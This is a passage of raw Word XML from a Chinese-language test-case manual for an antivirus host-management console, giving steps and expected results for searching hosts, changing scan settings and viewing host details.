      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="72235F3E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48887E3C"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375F8EF3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FBE13C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表上方的搜索输入框，输入想要搜索的关键字，比如“23”；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FC9649" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击输入框右侧的搜索按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291E400B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看匹配到的主机列表。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088BB174" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22646808" wp14:editId="00F7C6F6">
                  <wp:extent cx="4175760" cy="1728470"/>
                  <wp:effectExtent l="0" t="0" r="15240" b="24130"/>
                  <wp:docPr id="19" name="图片 19" descr="C:\Users\PC-2\AppData\Local\Temp\15294858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PC-2\AppData\Local\Temp\1529485837(1).png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId116" cstate="print">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect t="12773"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4175760" cy="1728470"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="51BC5F6E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5209BEE4"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5AED03EC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>输入关键字搜索到匹配的主机列表</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="19791A19" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A5F1FA"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7340D6B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55EAE3CF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="392" w:name="_Toc36487979"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改扫描设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>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7B35485D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3254EA"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38F0713F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>修改扫描设置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4CF5E889" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="462606C1"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3BDDF467" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>修改病毒扫描的设置选项。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4DF4B11D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E6B6CD"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7DFF8094" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="45B09257" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3B8F69"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6AF97BDE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0011F3DB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击列表上方的“扫描设置”按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC4C3F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>修改弹窗中展示的选项；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="569DD4E9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击“保存设置”按钮。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FFDC662"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noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C988CDB" wp14:editId="43607DF5">
                  <wp:extent cx="4211955" cy="2816225"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="3175"/>
                  <wp:docPr id="551" name="图片 551" descr="C:\Users\PC-2\AppData\Local\Temp\1529487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PC-2\AppData\Local\Temp\1529487613(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4211955" cy="2816225"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4AA42562" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21EAED72"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4CA40016" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>扫描设置被成功修改</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1FB57F8C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="163AEED4"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6DE906C4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10EAD888" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="393" w:name="_Toc36487980"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看主机详细信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="393"/>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6CCE95BE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C819580"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32511CE7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看主机详细信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0E504859" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C539355"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3D4800B7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看主机的详细信息</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7B5120AC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F425F8"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0961784F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="06D7B8D2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="725F6C9A"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51D6558B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="269C8A3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表中一个主机右侧的“详细信息”链接，进入主机详情页面。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7030B5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CD017C" wp14:editId="3EBED7F3">
                  <wp:extent cx="4104005" cy="1626870"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="24130"/>
                  <wp:docPr id="552" name="图片 552" descr="C:\Users\PC-2\AppData\Local\Temp\15294879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PC-2\AppData\Local\Temp\1529487942(1).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4104005" cy="1626870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="110974D6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A6F6051" wp14:editId="5DCED180">
                  <wp:extent cx="4104005" cy="1920875"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="9525"/>
                  <wp:docPr id="37" name="图片 37" descr="C:\Users\PC-2\AppData\Local\Temp\15294879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PC-2\AppData\Local\Temp\1529487965(1).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4104005" cy="1920875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D3EA7E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="15AA6F43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CDA09FC"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73BDDD23" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看列表中一个主机的详细信息</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>包括主机在线状态</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查杀日志</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>以及其他对主机的操作</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55D98AB0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2CBAF335" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467B1157"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7A5512B0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
